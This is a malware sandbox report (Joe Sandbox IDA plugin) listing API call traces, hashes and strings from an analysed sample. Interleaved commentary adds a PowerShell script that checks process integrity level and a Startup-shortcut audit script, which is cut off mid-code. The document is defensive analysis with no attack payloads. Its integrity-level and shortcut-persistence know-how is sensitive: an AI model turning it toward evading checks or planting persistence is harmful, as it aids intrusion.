                                              • Opcode ID: c4c15caa46fb10a0c87f0c9b9384f4fc55a417c8c1e73d9c0514b13c7bb7f596
                                              • Instruction ID: 99f2ac96d5d9ad2996b14af6d9e6d281a1c5b1138d1f6b41153782fc9b3efe1f
                                              • Opcode Fuzzy Hash: c4c15caa46fb10a0c87f0c9b9384f4fc55a417c8c1e73d9c0514b13c7bb7f596
                                              • Instruction Fuzzy Hash: 8A31E071504219EBDF14CFA8D94CAAE7BB5EB05315F10826AF925E75D0DBB09910CB90
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00BAB204
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BAB221
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BAB259
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BAB27F
                                              • _wcsstr.LIBCMT ref: 00BAB289
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID:
                                              • API String ID: 3902887630-0
                                              • Opcode ID: 9ae71a9975a04bc0e5c1cf2b58b21b2ef9f8e5f6704f5926294c019ef91798f7
                                              • Instruction ID: 5ab9bb711509fe66688db91bd34c57863d562ac779ede417a65db95340fc3519
                                              • Opcode Fuzzy Hash: 9ae71a9975a04bc0e5c1cf2b58b21b2ef9f8e5f6704f5926294c019ef91798f7
                                              • Instruction Fuzzy Hash: 5321D332609201BAEB255B759C49E7FBFD8DB4A710F0081BBF819DA1A2EF61DC409660
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BDB192
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BDB1B7
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BDB1CF
                                              • GetSystemMetrics.USER32(00000004), ref: 00BDB1F8
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BC0E90,00000000), ref: 00BDB216
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
                                              • Opcode ID: fa247c44497478bdf09c5234582ed670d8a03641aaa3b092fb31b576f3cf0844
                                              • Instruction ID: de97e543382c44f8ff237782b3f357a31f9c46cd3093634d832838ca2d77f79d
                                              • Opcode Fuzzy Hash: fa247c44497478bdf09c5234582ed670d8a03641aaa3b092fb31b576f3cf0844
                                              • Instruction Fuzzy Hash: 96217171924251EFCB109F389C54F6ABBE4FB06361B16477AA926D72E0F73098108B90
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BA9320
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA9352
                                              • __itow.LIBCMT ref: 00BA936A
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA9392
                                              • __itow.LIBCMT ref: 00BA93A3
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID:
                                              • API String ID: 2983881199-0
                                              • Opcode ID: a6bb677a85f8173cd4dde3bf5b1433ce5d1da7e55d84a2f21c7b919c07e31f53
                                              • Instruction ID: 5d5e5aa2c79838977157d133af85896c7851c2d665f8e905aba186da1a06f67c
                                              • Opcode Fuzzy Hash: a6bb677a85f8173cd4dde3bf5b1433ce5d1da7e55d84a2f21c7b919c07e31f53
                                              • Instruction Fuzzy Hash: A2210731709208ABDF109A609C89EAE7BFCEF4AB10F0480A5FD05D72D0DAB0CD45A795
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00BC5A6E
                                              • GetForegroundWindow.USER32 ref: 00BC5A85
                                              • GetDC.USER32(00000000), ref: 00BC5AC1
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00BC5ACD
                                              • ReleaseDC.USER32(00000000,00000003), ref: 00BC5B08
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: 2417f32e834050247d7ce600ef6cbcbf85e3948e1f78e674e969b26108d97a4c
                                              • Instruction ID: b6779ba382c50132d251980f2f63fae786167ec92b0f9adc63b83d7c35860843
                                              • Opcode Fuzzy Hash: 2417f32e834050247d7ce600ef6cbcbf85e3948e1f78e674e969b26108d97a4c
                                              • Instruction Fuzzy Hash: B5219F35A01104AFD710EF65D884AAABBE9EF48310F1480B9F80A97362DE70ED41CB90
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B5134D
                                              • SelectObject.GDI32(?,00000000), ref: 00B5135C
                                              • BeginPath.GDI32(?), ref: 00B51373
                                              • SelectObject.GDI32(?,00000000), ref: 00B5139C
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: c9137ea1a4a31e85cfcd6b719106ccedc578dbfbae7fd53f9d31763fa03200c0
                                              • Instruction ID: d2250bdebbea5a3b3ae303cf63a0962f9b57108ff75f7bbb29f38047b5192839
                                              • Opcode Fuzzy Hash: c9137ea1a4a31e85cfcd6b719106ccedc578dbfbae7fd53f9d31763fa03200c0
                                              • Instruction Fuzzy Hash: EA219D30841608EFEB109F29DC54BAD7BE9FB42322F1486A6F811971F0D770989ACF94
                                              APIs
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 780f00db40c7ccc75fcebc4349589304cced828d9261438f2d2dbad9b4b988f9
                                              • Instruction ID: 12a45b54ab33a10c3d9ce708e4caf34370626f5c5107e7ebdc4e724541c028a5
                                              • Opcode Fuzzy Hash: 780f00db40c7ccc75fcebc4349589304cced828d9261438f2d2dbad9b4b988f9
                                              • Instruction Fuzzy Hash: 7501B5716081497BD7046B1A9D82FBBB3DCDE12398F1484A1FD29A7343FB50EE1096B0
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00BB4ABA
                                              • __beginthreadex.LIBCMT ref: 00BB4AD8
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00BB4AED
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BB4B03
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BB4B0A
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: 0420907f10fcae8d61a8a985e86577c83e93221c888ba9316243087eb93a1ffe
                                              • Instruction ID: 132aa4f4a1f29f5dfdcbddccefdf0279074c0d79684ca02f6d48535d049de43e
                                              • Opcode Fuzzy Hash: 0420907f10fcae8d61a8a985e86577c83e93221c888ba9316243087eb93a1ffe
                                              • Instruction Fuzzy Hash: 2D11A576909615BBC7119FA89C04BEE7FECFB86320F1482A6F925D3251D7B5C90487A0
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA821E
                                              • GetLastError.KERNEL32(?,00BA7CE2,?,?,?), ref: 00BA8228
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00BA7CE2,?,?,?), ref: 00BA8237
                                              • RtlAllocateHeap.NTDLL(00000000,?,00BA7CE2), ref: 00BA823E
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA8255
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 883493501-0
                                              • Opcode ID: 3c9e05aff23b10ad6d010a793d2c43d8be760d9d45786a86d0f3ca2f4bf9dc5f
                                              • Instruction ID: 291fa26f7870a52a92be68aa57c6798e7b0324fbd62b13b0b1ac2809fdb1a288
                                              • Opcode Fuzzy Hash: 3c9e05aff23b10ad6d010a793d2c43d8be760d9d45786a86d0f3ca2f4bf9dc5f
                                              • Instruction Fuzzy Hash: 4C016D71609205FFDB204FA5DC58D7BBBACEF8A754B50047AF90AC3220EE318D00CA60
                                              APIs
                                              • CLSIDFromProgID.COMBASE ref: 00BA7127
                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00BA7142
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7150
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00BA7160
                                              • CLSIDFromString.COMBASE(?,?), ref: 00BA716C
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: b11a965a8a49d6ca3124b2f20864b8c90e6547b1cef79e9b6998584b405a6b80
                                              • Instruction ID: 75355857a1ce1a812e6dff0b5c09efad2f4284e202aca33413784c3a799def40
                                              • Opcode Fuzzy Hash: b11a965a8a49d6ca3124b2f20864b8c90e6547b1cef79e9b6998584b405a6b80
                                              • Instruction Fuzzy Hash: 22017C7260E205ABDB118F64DC44AAABBEDEB457A1F1440A5FD05E3220EF32DD409BA0
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB5260
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BB526E
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB5276
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BB5280
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 8ed7e89d3828c7c539ebb5ed314295a4840e7859bea778464ccd1d03788ebcbe
                                              • Instruction ID: 89ca889db6e182335684be5c70bb861e6eb580bba4dac037cc5e94aabc344114
                                              • Opcode Fuzzy Hash: 8ed7e89d3828c7c539ebb5ed314295a4840e7859bea778464ccd1d03788ebcbe
                                              • Instruction Fuzzy Hash: 22010931D06A1ADBCF10AFA8E959AFDFBB8FB09711F40019AE942B3140DFB0555087A6
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA812B
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA813A
                                              • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00BA8141
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8157
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 47921759-0
                                              • Opcode ID: 97837ef28578f18ed119426e51b10abc9f42a7c0b6b926fca76b56b19d9de6af
                                              • Instruction ID: 3d508210f185a69b73c17bd1cba52a68b96073fcd073a212e829c9bd476dcce1
                                              • Opcode Fuzzy Hash: 97837ef28578f18ed119426e51b10abc9f42a7c0b6b926fca76b56b19d9de6af
                                              • Instruction Fuzzy Hash: D5F04F71209306AFEB110FA5EC98E777BACFF4A754B040076F986D7150EE719941DA60
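The five-call sequence above is the standard two-pass token query: GetTokenInformation is called once with a NULL buffer, GetLastError is expected to report ERROR_INSUFFICIENT_BUFFER (122) alongside the required size, a buffer is taken from the process heap, and the call is repeated. One caveat on the sandbox's argument labels: in TOKEN_INFORMATION_CLASS the value 3 is TokenPrivileges, while TokenIntegrityLevel is 25, so the "(TokenIntegrityLevel)" annotation on the second argument is the tool's reconstruction rather than a decoded constant and should be confirmed in the disassembly. The PowerShell below is an added example, not code from the report or from the sample. It runs the same two-pass query for TokenIntegrityLevel against the current process token and maps the label SID's RID to a level name, which is a quick way to confirm on an analysis host what integrity level a sample was started with. Marshal.AllocHGlobal stands in for the GetProcessHeap/RtlAllocateHeap pair in the trace.

```powershell
# Added example, not code from the report or the sample: replay the two-pass
# GetTokenInformation(TokenIntegrityLevel) query against the current process token.
if (-not ('TokenNative' -as [type])) {
    Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class TokenNative {
    public const int TokenIntegrityLevel = 25;        // TOKEN_INFORMATION_CLASS (3 would be TokenPrivileges)
    public const int ERROR_INSUFFICIENT_BUFFER = 122;
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool GetTokenInformation(IntPtr token, int infoClass,
        IntPtr buffer, int bufferLength, out int returnLength);
    [DllImport("advapi32.dll")]
    public static extern IntPtr GetSidSubAuthorityCount(IntPtr sid);
    [DllImport("advapi32.dll")]
    public static extern IntPtr GetSidSubAuthority(IntPtr sid, int index);
}
'@
}

function Get-ProcessIntegrityLevel {
    $Marshal = [System.Runtime.InteropServices.Marshal]
    $token   = [System.Security.Principal.WindowsIdentity]::GetCurrent().Token

    # Pass 1: NULL buffer. The call must fail with ERROR_INSUFFICIENT_BUFFER and
    # hand back the size of the TOKEN_MANDATORY_LABEL it wants to write.
    $needed = 0
    $ok  = [TokenNative]::GetTokenInformation($token, [TokenNative]::TokenIntegrityLevel,
                                              [IntPtr]::Zero, 0, [ref]$needed)
    $err = $Marshal::GetLastWin32Error()
    if ($ok -or $err -ne [TokenNative]::ERROR_INSUFFICIENT_BUFFER) {
        throw "size query returned ok=$ok, error=$err (expected 122)"
    }

    # Pass 2: allocate and query for real (AllocHGlobal in place of RtlAllocateHeap).
    $buf = $Marshal::AllocHGlobal($needed)
    try {
        if (-not [TokenNative]::GetTokenInformation($token, [TokenNative]::TokenIntegrityLevel,
                                                    $buf, $needed, [ref]$needed)) {
            throw "GetTokenInformation failed, error=$($Marshal::GetLastWin32Error())"
        }
        # TOKEN_MANDATORY_LABEL begins with SID_AND_ATTRIBUTES { PSID Sid; DWORD Attributes }.
        $sid   = $Marshal::ReadIntPtr($buf)
        $count = $Marshal::ReadByte([TokenNative]::GetSidSubAuthorityCount($sid))
        # The label SID is S-1-16-<RID>; the RID is its last sub-authority.
        $rid   = $Marshal::ReadInt32([TokenNative]::GetSidSubAuthority($sid, $count - 1))
    } finally {
        $Marshal::FreeHGlobal($buf)
    }

    $level = if ($rid -lt 0x1000) { 'Untrusted' } elseif ($rid -lt 0x2000) { 'Low' } elseif ($rid -lt 0x3000) { 'Medium' } elseif ($rid -lt 0x4000) { 'High' } else { 'System or higher' }
    [pscustomobject]@{ Sid = "S-1-16-$rid"; Rid = ('0x{0:X}' -f $rid); Level = $level }
}

Get-ProcessIntegrityLevel
```

Run it once from a normal console and once from an elevated one: a sample launched from the first sees RID 0x2000 (Medium), from the second 0x3000 (High), and whether an integrity check like the one traced here finds the former or the latter is what decides whether any elevation logic in the sample is exercised at all.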
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 00BAC1F7
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00BAC20E
                                              • MessageBeep.USER32(00000000), ref: 00BAC226
                                              • KillTimer.USER32(?,0000040A), ref: 00BAC242
                                              • EndDialog.USER32(?,00000001), ref: 00BAC25C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: 0a610ce7894ba54bf8f4edd96990b8b704d43c3802a9bf4b9f551b80cb53e484
                                              • Instruction ID: 9bb2afc92dd7d7ef74bc07fdc58db34242fb5ebe20644024cfc32bd308bc35e1
                                              • Opcode Fuzzy Hash: 0a610ce7894ba54bf8f4edd96990b8b704d43c3802a9bf4b9f551b80cb53e484
                                              • Instruction Fuzzy Hash: 4F01A73050830597EB205B50ED5EBA6BBF8FB01706F0002AAA553914E0DBF0A944CB50
                                              APIs
                                              • EndPath.GDI32(?), ref: 00B513BF
                                              • StrokeAndFillPath.GDI32(?,?,00B8B888,00000000,?), ref: 00B513DB
                                              • SelectObject.GDI32(?,00000000), ref: 00B513EE
                                              • DeleteObject.GDI32 ref: 00B51401
                                              • StrokePath.GDI32(?), ref: 00B5141C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 87aaa66d105584e6f3557aa1b8070836cc5eb1ad891475f498ddea1d7263f31e
                                              • Instruction ID: 32babe898353d879cdd5c37cde2479c19b8ac6be91221b97454e4fa8721bfa68
                                              • Opcode Fuzzy Hash: 87aaa66d105584e6f3557aa1b8070836cc5eb1ad891475f498ddea1d7263f31e
                                              • Instruction Fuzzy Hash: 6CF01D30045609EBEB115F1AEC5C7AC7BE5F742326F08C265E82A4A1F1D7304596DF10
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BA899D
                                              • CloseHandle.KERNEL32(?), ref: 00BA89B2
                                              • CloseHandle.KERNEL32(?), ref: 00BA89BA
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA89C3
                                              • HeapFree.KERNEL32(00000000), ref: 00BA89CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                              • String ID:
                                              • API String ID: 3751786701-0
                                              • Opcode ID: ea81ed0f726fd5edc4ed5ebeae8c593a516f9ff1556702d0e9ec81ccda5c30ad
                                              • Instruction ID: 341d611e0a86edba22e0d17ebb44c939e63ba326027c6d80f442ddd1d802631c
                                              • Opcode Fuzzy Hash: ea81ed0f726fd5edc4ed5ebeae8c593a516f9ff1556702d0e9ec81ccda5c30ad
                                              • Instruction Fuzzy Hash: C7E0C936109002FBDA011FE5EC1C965FF69FB893227108232F21692170DF325420DB50
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00BBC432
                                              • CoCreateInstance.COMBASE(00BE2D6C,00000000,00000001,00BE2BDC,?), ref: 00BBC44A
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                              • CoUninitialize.COMBASE ref: 00BBC6B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: b32710ddd11a1da3915c2752c43cc73f9b016ae84a39041c4ef8e770f2224ba3
                                              • Instruction ID: 96d25ce5618c715777dba571ad4481e3b629da5d18b50ee6519955c117ffe56d
                                              • Opcode Fuzzy Hash: b32710ddd11a1da3915c2752c43cc73f9b016ae84a39041c4ef8e770f2224ba3
                                              • Instruction Fuzzy Hash: 84A14DB1108205AFD700EF54C891EAFB7E8EF89345F0049ACF5559B1A2DB71E909CB52
                                              APIs
                                                • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00B57A51: _memmove.LIBCMT ref: 00B57AAB
                                              • __swprintf.LIBCMT ref: 00B62ECD
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B62D66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: a6e003d1ad53c40f6eabb097a2b6937bd0ca2c6eddbca06a44588cad4b61c288
                                              • Instruction ID: f7a018c85978409d920cc69128658c042c34ab53d4545215014eb1fa21cc26b2
                                              • Opcode Fuzzy Hash: a6e003d1ad53c40f6eabb097a2b6937bd0ca2c6eddbca06a44588cad4b61c288
                                              • Instruction Fuzzy Hash: 40919E712086019FDB14EF24D896D6EB7E8EF85711F0048EDF8559B2A1EB34ED48CB62
                                              APIs
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                              • CoInitialize.OLE32(00000000), ref: 00BBB9BB
                                              • CoCreateInstance.COMBASE(00BE2D6C,00000000,00000001,00BE2BDC,?), ref: 00BBB9D4
                                              • CoUninitialize.COMBASE ref: 00BBB9F1
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                               • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                              • String ID: .lnk
                                              • API String ID: 2126378814-24824748
                                              • Opcode ID: b816279266d01b4d3e1a3089e711e9018ab3e5a8305a328bc950aeac211ed4a3
                                              • Instruction ID: 366f0ebcb969bbbe5a4274d319f0fae481aecda34b48948335192f71be741723
                                              • Opcode Fuzzy Hash: b816279266d01b4d3e1a3089e711e9018ab3e5a8305a328bc950aeac211ed4a3
                                              • Instruction Fuzzy Hash: F3A166756043019FCB10DF14C894E6ABBE5FF89314F148998F89A9B3A2CB71EC49CB91
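Both COM sequences that carry the ".lnk" string (CoInitialize, CoCreateInstance, CoUninitialize at 00BBC432 and again at 00BBB9BB, the second one preceded by GetFullPathNameW) only show the CLSID and IID as addresses (00BE2D6C, 00BE2BDC), so reading them as shell-link object creation is an inference from the string, not something the report states. What a responder wants after a run like this is to see which shortcuts now sit in the Startup folders and where they point. The PowerShell below is an added example, not the sample's or the report's code: it loads every .lnk in the per-user and all-users Startup folders through the WScript.Shell shortcut object, which is a scripting wrapper over the shell's link object, and flags any target that resolves outside Program Files or the Windows directory.

```powershell
# Added example, not the sample's or the report's code: resolve each .lnk in the
# Startup folders and flag targets that point outside the usual system roots.
function Get-StartupShortcutTargets {
    param(
        [string[]]$Folders = @(
            [Environment]::GetFolderPath('Startup'),        # per-user Startup
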